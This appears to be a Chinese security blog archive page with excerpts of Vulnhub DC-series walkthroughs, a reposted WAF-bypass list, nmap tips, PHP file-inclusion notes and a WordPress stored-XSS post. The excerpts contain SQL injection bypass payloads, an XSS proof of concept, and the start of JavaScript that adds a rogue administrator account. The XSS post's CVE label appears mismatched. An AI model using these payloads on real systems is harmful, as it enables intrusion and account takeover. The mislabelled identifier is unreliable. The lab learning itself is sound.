DC-5
0x001234nmap -Pn 192.168.114.0/24nmap -A -T 4 192.168.114.146
特地查了一下rpcbind,大概是将RPC服务映射到其侦听的端口的服务,和DNS类似。
rpcbind [3]实用程序将RPC服务映射到其侦听的端口。RPC进程在启动时会通知rpcbind,注册正在侦听的端口以及期望使用的RPC程序号。然后,客户端系统使用特定的RPC程序服务器与服务器上的rpcbind联系。rpcbind服务重新设置客户端重定向到正确的端口号,刹车它可以与请求的服务进行通信
80端口也是打开的,先试试从80端口入手
wappalyzer只检测出它是php编写的,以及服务器是nginx。
访问contact的时候,发现有一个留言功能,或许可以试试xss
burp跑了字典,不行
试试跑目录,什么都没跑出来
sql注入,试了几个原始头参数,没用
实在没办法了,还是乖乖的去看大佬文章学知识吧
作者提到,当我们提交contact表单时,下边的logo会从2019变成2020
未提交前:
提交后:
测试了很久发现是LFI漏洞
其实首页就已经提示了 ...
DC-4
环境照理下载vulnhub的dc-4项目进行练习
设置的网卡是NAT,其实也可以设置成和物理网络相同的,凭喜好设置
正文0x001namp -Pn 192.168.114.0/24
看到了mac地址为虚拟机里的,IP地址为192.168.114.131
直接用浏览器访问查看
尝试登陆了一下,不知道是不是我之前有记录的问题,我随便输入passwd都可以进入,但其实burp爆出来的密码是happy,用户名是admin,登录以后的状态其实就是一个命令执行的frame
直接使用firfox自带的查看器,进行代码更改为ifconfig,发现不行
但whoami可以
后知后觉,想起来了burp,对不起!大神,忘了你
然后用burp饶了一下,cat+/etc/passwd
仔细看最后几排,会发现,有一些不同于往常linux用户的自建立用户
jim、charles、sam(它好像是linux有的)
继续用burp试了下查看其他目录,发现只有/home目录可以访问,一路下去,就发现了
然后将复制粘贴,将这些密码保存到随便一个txt文件里,命令为passw ...
常见WAF绕过
转载于:https://www.freebuf.com/column/228763.html
PHPIDS
0.6.1.1默认规则 :
拒绝:/?id=1+union+select+user,password+from+mysql.user+where+user=1
允许:/?id=1+union+select+user,password+from+mysql.user+limit+0,1
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR+0×50=0×50
拒绝:/?id=substring((1),1,1)
允许: /?id=mid((1),1,1)
Mod_Security
2.5.9默认规则:
拒绝: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
允许: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR ...
DC_3
前提本人为初学小白,若文章有什么不对的,请大家多多指教。
渗透测试0x01使用arp-scan扫描出本网段的主机
1arp-scan -l
可以看到靶机IP地址为192.168.3.17
尝试浏览器访问
这段话,大概就是,只有一个flag,需要拿到最高权限root。
试试nmap扫描端口信息什么的吧
1nmap -A -p- -T5 192.168.3.17
可以看到管理系统为Joomla CMS,是Ubuntu的操作系统。
好吧,网上有关于专门渗透Joomla的工具,叫joomscan
下载后,进入joomscan文件内,并对靶机进行扫描探测
1perl joomscan.pl -u http://192.168.3.17
可以看到,扫描该网站的版本是3.7.0,然后,也扫描到了admin的登录目录“administrator”,尝试访问
嗯,很好
0x02在kali里面搜索一下这个版本的漏洞,看看有什么可以用的没
1searchsploit Joomla 3.7.0
只有这个,然后看了一下这个漏洞的说明文档
有很多信息,它的编号,版本号,运行的环 ...
DC_2
前提:信息安全初学者一枚,正在努力提升中。。。。
今天渗透的实验靶场,是Vulnhub的DC-2,和之前的DC-1是同系列的。
环境介绍成功安装virtual Box,只需要下载vlunhub的DC-2项目,导入virtual中即可使用,不需要登录什么的。
渗透0x01老样子,打开你的kali,直接nmap,使用参数-Pn扫描网段
1nmap -Pn 192.168.3.0/24
继续扫描主机的详细信息
1nmap -A -p- -T4 192.168.3.13
0x02既然开启了80端口,那就直接浏览器访问吧
然后发现,这是将IP地址重定向了,那就,直接在/etc/hosts里进行设置吧(请注意,在windows下边,hosts文件在C:\Windows\System32\drivers\etc中)
修改完成后,再一次在浏览器中进行浏览,成功打开界面
0x03 flag1可以看到flag就在眼前
用dirb扫描一下目录吧,看看有没有有用的东西
1dirb http://dc-2/
这个好像是他的后台,先不管。
0x04 flag2之前找到的fla ...
dedecms低于5.7SP2任意文件上传漏洞
漏洞分析文件/dede/file_class.php
修复方法:打开/dede/file_class.php找到大概第161行的代码:
1else if(preg_match("/\.(".$fileexp.")/i",$filename))
修改为:
1else if(substr($filename, -strlen($fileexp))===$fileexp)
渗透测试实战技巧
转载于https://www.freebuf.com/sectool/105524.html
最好的 NMAP 扫描策略12345678910111213141516171819202122232425262728# 适用所有大小网络最好的 nmap 扫描策略# 主机发现,生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现,发现大部分常用端口# http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt$ nmap -sS -T4 -Pn --top-ports 3674 -oG ...
PHP文件包含漏洞利用思路与Bypass总结(不完整)
相关函数四个函数当利用下面这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。
php中引发文件包含漏洞的通常主要是以下四个函数:
1、include()
1http://www.php.net/manual/en/function.include.php
2、include_once()
1http://php.net/manual/en/function.include-once.php
3、require()
1http://php.net/manual/en/function.require.php
4、require_once()
1http://php.net/manual/en/function.require-once.php
函数差异include()
include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行
require()
require() 函数包含出错的话,则会直接退出,后续语句不在执行
include_once() 和 require_once()
require_once() 和 ...
著名绿眼逻辑谜题
keyword:多读书多看报,少吃零食多睡觉
CVE-2019-6977
0x00此漏洞为存储型XSS,存在于WordPress 5.0到5.0.4,5.1和5.1.1版本
0x01存在的地方为文章写入的地方
Poc
"><img src=1 onerror=alert("bosch")>
0x02结果
如果被攻击者恰好拥有管理员权限,则攻击者即可以利用此漏洞获取管理员帐户的控制权,利用WordPress内置函数 getShell,然后控制服务器
0x00攻击者可以在其Web服务器上托管JavaScript文件
此JavaScript代码将添加一个WordPress管理员帐户,账号密码为bosch
123456789101112131415// Send a GET request to the URL '/wordpress/wp-admin/user-new.php', and extract the current 'nonce' value var ajaxRequest = new XMLHttpRequest(); var requestURL = ...